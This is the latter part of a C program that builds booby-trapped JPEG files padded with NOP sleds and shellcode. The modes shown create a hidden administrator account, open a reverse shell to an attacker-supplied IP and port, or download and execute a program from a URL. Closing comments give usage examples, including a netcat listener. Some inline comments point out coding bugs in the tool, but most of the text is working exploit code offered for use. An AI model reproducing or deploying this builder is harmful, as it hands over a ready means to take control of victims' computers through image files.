for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
WSACleanup();
}

//Create User "ASP32.NET"
if (atoi(argv[1]) == 3)
{
show();
mkdir("Crypto"); // return value unchecked
fout=fopen("Crypto\\Crypto3.jpg","wb");

if( !fout ) {
printf("\t\tErorr:Opening File ...\n");
exit(1);
}



// Same FF D9 scan as mode 1 (warning only).
for(i=0;i<sizeof(shellcode3)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode3[i] )
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode3)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode3[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
}

//reverse connect back
if (atoi(argv[1]) == 4)
{
show();
mkdir("Crypto"); // return value unchecked
// Note: same output name as mode 2, so running mode 4 after mode 2
// silently overwrites Crypto2.jpg.
fout=fopen("Crypto\\Crypto2.jpg","wb");

if( !fout ) {
printf("\t\tErorr:Opening File ...\n");
exit(1);
}

// let's initialize the socket library, couse we use htons function
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!\n");
exit(1);
}

// argv[2] and argv[3] are read without an argc >= 4 check. inet_addr()
// returns INADDR_NONE for an unparsable address, and that is never
// checked — the value is patched into the buffer regardless. Both macros
// perform unaligned writes at offsets fixed in their definitions.
ip = inet_addr(argv[2]);
port = atoi(argv[3]);
SET_CONNECTBACK_IP(shellcode4, ip);
SET_CONNECTBACK_PORT(shellcode4, htons(port));

// Same FF D9 scan as mode 1 (warning only).
for(i=0;i<sizeof(shellcode4)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode4[i] )
printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode4)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode4[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
WSACleanup();
}

//download from http: argv[2] is the URL
if (atoi(argv[1]) == 5)
{
show();
mkdir("Crypto"); // return value unchecked
fout=fopen("Crypto\\Crypto5.jpg","wb");

if( !fout ) {
printf("\t\tErorr:Opening File ...\n");
exit(1);
}

// argv[2] is read without an argc >= 3 check. shellcode5 is sized exactly
// to its initializer, so strcat() appends past the end of the array for any
// non-empty argument: a buffer overflow in this tool's own memory
// (undefined behaviour), not a bounded copy. A trailing 0x01 byte is
// appended after the argument.
strcat(shellcode5,argv[2]);
strcat(shellcode5,"\x01");


// Same FF D9 scan as mode 1 (warning only). sizeof() is a compile-time
// value, so the bytes appended above are outside the scanned range.
for(i=0;i<sizeof(shellcode5)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode5[i] )
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode5)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;

for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode5[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
}

// Reached both after a successful mode and when argv[1] matched nothing.
return 0;
}

// You have read till here ? :)
// Well, the code was not optimized on purpose, so others could add some more shellcodes
// with an easy copy+paste :)
// OK some examples here:
//D:\C++\Debug>sacred_jpg.exe 1 [it will pop up cmd.exe]
//D:\C++\Debug>sacred_jpg.exe 2 8081 [it will bind cmd.exe on port 8081]
//D:\C++\Debug>sacred_jpg.exe 3 [it will add user "ASP32.NET" as an administrator]
//D:\C++\Debug>sacred_jpg.exe 4 192.168.0.1 31337
//[it will connect to 192.168.0.1 on port 31337, of course there listens nc :), nc -l -p 31337]
//D:\C++\Debug>sacred_jpg.exe 5 http://yourserver.com/program.exe [it will download and then execute program.exe]
//by the way you can compile source code with VC++ 6.0
